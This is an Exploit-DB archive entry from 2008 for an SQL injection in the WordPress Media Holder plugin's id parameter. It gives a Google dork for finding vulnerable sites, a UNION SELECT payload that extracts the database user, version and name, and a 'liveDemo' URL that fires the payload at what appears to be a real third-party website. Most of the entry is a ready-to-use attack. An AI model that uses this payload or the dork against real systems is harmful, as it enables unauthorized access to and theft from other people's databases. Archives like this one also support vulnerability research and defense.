WordPress Plugin Media Holder - SQL Injection

EDB-ID:

6842

CVE:

N/A

EDB Verified:

Author:

boom3rang

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-26

Vulnerable App:

-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site   :  www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork:         mediaHolder.php?id
-------------------------------------------------------------------
Exp:          http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit:      -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------


-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services